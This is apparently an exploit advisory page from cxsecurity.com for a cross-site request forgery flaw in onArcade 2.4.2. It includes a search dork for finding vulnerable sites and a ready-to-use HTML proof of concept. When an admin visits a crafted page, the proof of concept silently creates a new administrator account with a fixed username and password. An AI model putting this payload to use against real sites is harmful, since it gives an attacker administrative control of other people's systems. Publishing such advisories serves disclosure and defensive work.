onArcade 2.4.2 Cross Site Request Forgery

Credit: r3m0t3nu11
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352

# Exploit Title: Cross-Site Request Forgery (Add Admin) # Google Dork: Powered by onArcade v2.4.2 # Date: 2018/August/4 # Author: r3m0t3nu11[Zero-way] # Software Link: ["http://www.onarcade.com"] # Version: ["Uptodate"] the appilication is vulnerable to CSRF attack (No CSRF token in place) meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering). [P0C]# <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://vulnapp.com/path/admin/members.php?a=add_member&ajax=1"method="POST"> <input type="hidden" name="username" value="r3m0t3nu11" /> <input type="hidden" name="email" value="l0v3rs14&#64;gmail&#46;com"/> <input type="hidden" name="password" value="123123" /> <input type="hidden" name="user&#95;group" value="2" /> <input type="submit" value="Submit request" /> </form> </body> </html>

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com


Back to Top